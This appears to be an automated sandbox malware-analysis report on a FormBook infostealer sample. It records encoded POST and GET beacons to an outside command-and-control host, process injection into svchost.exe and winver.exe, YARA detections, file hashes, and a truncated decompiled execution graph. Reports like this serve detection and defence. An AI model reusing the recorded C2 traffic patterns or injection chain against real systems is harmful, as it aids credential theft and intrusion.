69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.1049990103.21.221.87806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:28:07.510123014 CET1774OUTPOST /mv7p/ HTTP/1.1
                                                        Host: www.rtpterbaruwaktu3.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.rtpterbaruwaktu3.xyz
                                                        Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 1232
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 32 6e 34 68 6e 4f 44 41 44 52 74 6b 56 48 71 2b 2b 39 74 58 7a 4e 39 31 36 43 55 45 42 39 63 56 74 42 6e 7a 48 55 7a 31 73 61 52 54 34 63 74 4f 5a 6b 6d 4c 61 58 72 47 6b 65 50 34 52 55 2f 70 66 4d 49 5a 6f 75 67 6f 63 70 73 77 33 58 62 32 4f 6f 75 54 5a 45 4a 49 39 34 38 4c 48 36 50 63 34 4c 5a 63 44 34 4f 4f 68 62 4c 31 68 77 38 33 6e 61 43 30 73 78 57 72 7a 73 55 64 4d 59 50 31 56 62 6e 2f 2b 6a 65 4a 4c 45 36 6f 76 62 44 36 75 47 58 4c 6b 4a 52 6a 39 51 69 31 6f 35 4c 49 51 31 70 6e 76 50 53 57 31 4c 52 36 47 79 2f 6a 49 56 42 55 79 6f 48 58 6c 46 34 57 4f 62 45 7a 55 7a 71 30 72 35 69 59 42 32 54 48 70 70 72 43 74 71 2f 41 71 49 4a 34 57 32 53 58 4b 4d 75 6e 74 4e 74 5a 2f 6c 51 49 47 6e 72 72 43 6d 2f 72 58 74 72 66 6d 34 56 5a 37 50 59 32 61 4e 32 38 49 50 42 76 75 4f 67 71 44 32 71 31 5a 64 38 51 7a 68 76 34 74 78 69 4c 4a 74 64 57 68 7a 30 73 6b [TRUNCATED]
                                                        Data Ascii: KzB47nV=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI22n4hnODADRtkVHq++9tXzN916CUEB9cVtBnzHUz1saRT4ctOZkmLaXrGkeP4RU/pfMIZougocpsw3Xb2OouTZEJI948LH6Pc4LZcD4OOhbL1hw83naC0sxWrzsUdMYP1Vbn/+jeJLE6ovbD6uGXLkJRj9Qi1o5LIQ1pnvPSW1LR6Gy/jIVBUyoHXlF4WObEzUzq0r5iYB2THpprCtq/AqIJ4W2SXKMuntNtZ/lQIGnrrCm/rXtrfm4VZ7PY2aN28IPBvuOgqD2q1Zd8Qzhv4txiLJtdWhz0sk/wwVGq9UeIcHFQ6Nt9/DSv5wpOIOeCgumcdiFpatwzK3owwGceWMnLnvOM0zJYPtDV65iTqsFT3wnW4R68wb46TlMeUAjJi0LGPhAPCAIbWxdNpYdLG6L0a8Fp7YSOgtHEAbocwO3AZlEziIxWbT71u1qJqzSMgpMzs3uvRYCnYYy63icCkMpoSLjoyoqtdI9Uz4bPJSsgSzdfEKH3kKCgFEkhkpWGT0+GUGVvyCV5GT3fduvDVz+TbrcqpasBZNvEUpqWTk6Jl9PcSXwq6cq7NqeM+TCUxiiwQCaY8gMQTch5Xza70E2akOiukWyS0V3hg/OB0l7kBiBxRvfamK3+93p/n/WVnIkxRRTJWhTqfaoPaGTPPphtQ+lE6th9l+ymTaGwAHkmrF6Njw54FsjyASS1/cq54e9jdQS4MLvxgKNmEoQQQQ4MIamtIRD7UFg+i/Fkq/nzeo0yMVX7oiBrVDxFUdVNtNXlsI/p3BOsqG2KPNvOtcrNfcabAqNk4e+4pVgMw8IUnhnE5b1mnAGWODNZh73BSgMYaAOcPdpdCxiA2fTJ4D+6ye5Go1xQsJUbATQ5vcjYTzkk0lbD8n1xJPAIFrEcmtc521kcEUHImFr2h9/PXh9j5nURKrgNponUquwCNZpRKy0+5GDqS4HQshjy3WR5shHF [TRUNCATED]
                                                        Jan 10, 2025 20:28:08.393552065 CET1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Fri, 10 Jan 2025 19:28:08 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.1049991103.21.221.87806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:28:10.046586990 CET463OUTGET /mv7p/?KzB47nV=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJqQPM7lgRIPKEXKG9BUPo7IhW8nQqw==&ity41=G4jxKXr HTTP/1.1
                                                        Host: www.rtpterbaruwaktu3.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Jan 10, 2025 20:28:11.289968967 CET1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Fri, 10 Jan 2025 19:28:10 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                                                        Jan 10, 2025 20:28:11.290047884 CET1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Fri, 10 Jan 2025 19:28:10 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:14:26:08
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\aBEh0fsi2c.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\aBEh0fsi2c.exe"
                                                        Imagebase:0x360000
                                                        File size:1'183'744 bytes
                                                        MD5 hash:AE1FE8E567226C914DC9A747E25D2118
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:14:26:12
                                                        Start date:10/01/2025
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\aBEh0fsi2c.exe"
                                                        Imagebase:0xab0000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:14:26:38
                                                        Start date:10/01/2025
                                                        Path:C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe"
                                                        Imagebase:0x8d0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:14:26:41
                                                        Start date:10/01/2025
                                                        Path:C:\Windows\SysWOW64\winver.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\winver.exe"
                                                        Imagebase:0x820000
                                                        File size:57'344 bytes
                                                        MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:14:26:53
                                                        Start date:10/01/2025
                                                        Path:C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe"
                                                        Imagebase:0x8d0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:14:27:10
                                                        Start date:10/01/2025
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff613480000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.8%
                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                          Signature Coverage:6.9%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:63
                                                          execution_graph 100703 361016 100708 364974 100703->100708 100718 380db6 100708->100718 100710 36497c 100712 36101b 100710->100712 100728 364936 100710->100728 100715 382d40 100712->100715 100821 382c44 100715->100821 100717 361025 100720 380dbe 100718->100720 100721 380dd8 100720->100721 100723 380ddc std::exception::exception 100720->100723 100756 38571c 100720->100756 100773 3833a1 DecodePointer 100720->100773 100721->100710 100774 38859b RaiseException 100723->100774 100725 380e06 100775 3884d1 58 API calls _free 100725->100775 100727 380e18 100727->100710 100729 36493f 100728->100729 100731 364951 100728->100731 100730 382d40 __cinit 67 API calls 100729->100730 100730->100731 100732 3649a0 100731->100732 100784 367667 100732->100784 100736 3649fb 100740 364a28 100736->100740 100802 367d2c 100736->100802 100738 364a1c 100806 367726 100738->100806 100741 364a93 GetCurrentProcess IsWow64Process 100740->100741 100743 39d864 100740->100743 100742 364aac 100741->100742 100744 364ac2 100742->100744 100745 364b2b GetSystemInfo 100742->100745 100798 364b37 100744->100798 100746 364af8 100745->100746 100746->100712 100749 364ad4 100752 364b37 2 API calls 100749->100752 100750 364b1f GetSystemInfo 100751 364ae9 100750->100751 100751->100746 100754 364aef FreeLibrary 100751->100754 100753 364adc GetNativeSystemInfo 100752->100753 100753->100751 100754->100746 100757 385797 100756->100757 100767 385728 100756->100767 100782 3833a1 DecodePointer 100757->100782 100759 38579d 100783 388b28 58 API calls __getptd_noexit 100759->100783 100762 38575b RtlAllocateHeap 100763 38578f 100762->100763 100762->100767 100763->100720 100765 385733 100765->100767 100776 38a16b 58 API calls 2 library calls 100765->100776 100777 38a1c8 58 API calls 8 library calls 100765->100777 100778 38309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100765->100778 100766 385783 100780 388b28 58 API calls __getptd_noexit 100766->100780 100767->100762 100767->100765 100767->100766 100771 385781 100767->100771 100779 3833a1 DecodePointer 100767->100779 100781 388b28 58 API calls __getptd_noexit 100771->100781 100773->100720 100774->100725 100775->100727 100776->100765 100777->100765 100779->100767 100780->100771 100781->100763 100782->100759 100783->100763 100785 380db6 Mailbox 59 API calls 100784->100785 100786 367688 100785->100786 100787 380db6 Mailbox 59 API calls 100786->100787 100788 3649b8 GetVersionExW 100787->100788 100789 367bcc 100788->100789 100790 367c45 100789->100790 100791 367bd8 __wsetenvp 100789->100791 100792 367d2c 59 API calls 100790->100792 100794 367c13 100791->100794 100795 367bee 100791->100795 100793 367bf6 _memmove 100792->100793 100793->100736 100814 368029 100794->100814 100810 367f27 100795->100810 100799 364ad0 100798->100799 100800 364b40 LoadLibraryA 100798->100800 100799->100749 100799->100750 100800->100799 100801 364b51 GetProcAddress 100800->100801 100801->100799 100803 367d3a 100802->100803 100805 367d43 _memmove 100802->100805 100803->100805 100817 367e4f 100803->100817 100805->100738 100807 367734 100806->100807 100808 367d2c 59 API calls 100807->100808 100809 367744 100808->100809 100809->100740 100811 367f3f 100810->100811 100813 367f39 100810->100813 100812 380db6 Mailbox 59 API calls 100811->100812 100812->100813 100813->100793 100815 380db6 Mailbox 59 API calls 100814->100815 100816 368033 100815->100816 100816->100793 100818 367e62 100817->100818 100820 367e5f _memmove 100817->100820 100819 380db6 Mailbox 59 API calls 100818->100819 100819->100820 100820->100805 100822 382c50 _wprintf 100821->100822 100829 383217 100822->100829 100828 382c77 _wprintf 100828->100717 100846 389c0b 100829->100846 100831 382c59 100832 382c88 DecodePointer DecodePointer 100831->100832 100833 382cb5 100832->100833 100834 382c65 100832->100834 100833->100834 100892 3887a4 59 API calls __wctomb_s_l 100833->100892 100843 382c82 100834->100843 100836 382cc7 100837 382d18 EncodePointer EncodePointer 100836->100837 100839 382cec 100836->100839 100893 388864 61 API calls __realloc_crt 100836->100893 100837->100834 100839->100834 100841 382d06 EncodePointer 100839->100841 100894 388864 61 API calls __realloc_crt 100839->100894 100841->100837 100842 382d00 100842->100834 100842->100841 100895 383220 100843->100895 100847 389c1c 100846->100847 100848 389c2f EnterCriticalSection 100846->100848 100853 389c93 100847->100853 100848->100831 100850 389c22 100850->100848 100877 3830b5 58 API calls 3 library calls 100850->100877 100854 389c9f _wprintf 100853->100854 100855 389ca8 100854->100855 100856 389cc0 100854->100856 100878 38a16b 58 API calls 2 library calls 100855->100878 100865 389ce1 _wprintf 100856->100865 100881 38881d 58 API calls 2 library calls 100856->100881 100859 389cad 100879 38a1c8 58 API calls 8 library calls 100859->100879 100861 389cd5 100863 389ceb 100861->100863 100864 389cdc 100861->100864 100862 389cb4 100880 38309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100862->100880 100868 389c0b __lock 58 API calls 100863->100868 100882 388b28 58 API calls __getptd_noexit 100864->100882 100865->100850 100870 389cf2 100868->100870 100871 389cff 100870->100871 100872 389d17 100870->100872 100883 389e2b InitializeCriticalSectionAndSpinCount 100871->100883 100884 382d55 100872->100884 100875 389d0b 100890 389d33 LeaveCriticalSection _doexit 100875->100890 100878->100859 100879->100862 100881->100861 100882->100865 100883->100875 100885 382d87 _free 100884->100885 100886 382d5e RtlFreeHeap 100884->100886 100885->100875 100886->100885 100887 382d73 100886->100887 100891 388b28 58 API calls __getptd_noexit 100887->100891 100889 382d79 GetLastError 100889->100885 100890->100865 100891->100889 100892->100836 100893->100839 100894->100842 100898 389d75 LeaveCriticalSection 100895->100898 100897 382c87 100897->100828 100898->100897 100899 361066 100904 36f76f 100899->100904 100901 36106c 100902 382d40 __cinit 67 API calls 100901->100902 100903 361076 100902->100903 100905 36f790 100904->100905 100937 37ff03 100905->100937 100909 36f7d7 100910 367667 59 API calls 100909->100910 100911 36f7e1 100910->100911 100912 367667 59 API calls 100911->100912 100913 36f7eb 100912->100913 100914 367667 59 API calls 100913->100914 100915 36f7f5 100914->100915 100916 367667 59 API calls 100915->100916 100917 36f833 100916->100917 100918 367667 59 API calls 100917->100918 100919 36f8fe 100918->100919 100947 375f87 100919->100947 100923 36f930 100924 367667 59 API calls 100923->100924 100925 36f93a 100924->100925 100975 37fd9e 100925->100975 100927 36f981 100928 36f991 GetStdHandle 100927->100928 100929 3a45ab 100928->100929 100930 36f9dd 100928->100930 100929->100930 100931 3a45b4 100929->100931 100932 36f9e5 OleInitialize 100930->100932 100982 3c6b38 64 API calls Mailbox 100931->100982 100932->100901 100934 3a45bb 100983 3c7207 CreateThread 100934->100983 100936 3a45c7 CloseHandle 100936->100932 100984 37ffdc 100937->100984 100940 37ffdc 59 API calls 100941 37ff45 100940->100941 100942 367667 59 API calls 100941->100942 100943 37ff51 100942->100943 100944 367bcc 59 API calls 100943->100944 100945 36f796 100944->100945 100946 380162 6 API calls 100945->100946 100946->100909 100948 367667 59 API calls 100947->100948 100949 375f97 100948->100949 100950 367667 59 API calls 100949->100950 100951 375f9f 100950->100951 100991 375a9d 100951->100991 100954 375a9d 59 API calls 100955 375faf 100954->100955 100956 367667 59 API calls 100955->100956 100957 375fba 100956->100957 100958 380db6 Mailbox 59 API calls 100957->100958 100959 36f908 100958->100959 100960 3760f9 100959->100960 100961 376107 100960->100961 100962 367667 59 API calls 100961->100962 100963 376112 100962->100963 100964 367667 59 API calls 100963->100964 100965 37611d 100964->100965 100966 367667 59 API calls 100965->100966 100967 376128 100966->100967 100968 367667 59 API calls 100967->100968 100969 376133 100968->100969 100970 375a9d 59 API calls 100969->100970 100971 37613e 100970->100971 100972 380db6 Mailbox 59 API calls 100971->100972 100973 376145 RegisterWindowMessageW 100972->100973 100973->100923 100976 3b576f 100975->100976 100977 37fdae 100975->100977 100994 3c9ae7 60 API calls 100976->100994 100978 380db6 Mailbox 59 API calls 100977->100978 100980 37fdb6 100978->100980 100980->100927 100981 3b577a 100982->100934 100983->100936 100995 3c71ed 65 API calls 100983->100995 100985 367667 59 API calls 100984->100985 100986 37ffe7 100985->100986 100987 367667 59 API calls 100986->100987 100988 37ffef 100987->100988 100989 367667 59 API calls 100988->100989 100990 37ff3b 100989->100990 100990->100940 100992 367667 59 API calls 100991->100992 100993 375aa5 100992->100993 100993->100954 100994->100981 100996 3c8d0d 100997 3c8d1a 100996->100997 100998 3c8d20 100996->100998 100999 382d55 _free 58 API calls 100997->100999 101000 3c8d31 100998->101000 101002 382d55 _free 58 API calls 100998->101002 100999->100998 101001 3c8d43 101000->101001 101003 382d55 _free 58 API calls 101000->101003 101002->101000 101003->101001 101004 361055 101009 362649 101004->101009 101007 382d40 __cinit 67 API calls 101008 361064 101007->101008 101010 367667 59 API calls 101009->101010 101011 3626b7 101010->101011 101016 363582 101011->101016 101014 362754 101015 36105a 101014->101015 101019 363416 59 API calls 2 library calls 101014->101019 101015->101007 101020 3635b0 101016->101020 101019->101014 101021 3635a1 101020->101021 101022 3635bd 101020->101022 101021->101014 101022->101021 101023 3635c4 RegOpenKeyExW 101022->101023 101023->101021 101024 3635de RegQueryValueExW 101023->101024 101025 363614 RegCloseKey 101024->101025 101026 3635ff 101024->101026 101025->101021 101026->101025 101027 363633 101028 36366a 101027->101028 101029 3636e7 101028->101029 101030 363688 101028->101030 101068 3636e5 101028->101068 101032 39d0cc 101029->101032 101033 3636ed 101029->101033 101034 363695 101030->101034 101035 36374b PostQuitMessage 101030->101035 101031 3636ca DefWindowProcW 101061 3636d8 101031->101061 101082 371070 10 API calls Mailbox 101032->101082 101036 363715 SetTimer RegisterWindowMessageW 101033->101036 101037 3636f2 101033->101037 101039 3636a0 101034->101039 101040 39d154 101034->101040 101035->101061 101044 36373e CreatePopupMenu 101036->101044 101036->101061 101041 39d06f 101037->101041 101042 3636f9 KillTimer 101037->101042 101045 363755 101039->101045 101046 3636a8 101039->101046 101098 3c2527 71 API calls _memset 101040->101098 101048 39d0a8 MoveWindow 101041->101048 101049 39d074 101041->101049 101079 36443a Shell_NotifyIconW _memset 101042->101079 101043 39d0f3 101083 371093 342 API calls Mailbox 101043->101083 101044->101061 101072 3644a0 101045->101072 101052 39d139 101046->101052 101053 3636b3 101046->101053 101048->101061 101056 39d078 101049->101056 101057 39d097 SetFocus 101049->101057 101052->101031 101097 3b7c36 59 API calls Mailbox 101052->101097 101059 3636be 101053->101059 101060 39d124 101053->101060 101054 39d166 101054->101031 101054->101061 101056->101059 101062 39d081 101056->101062 101057->101061 101058 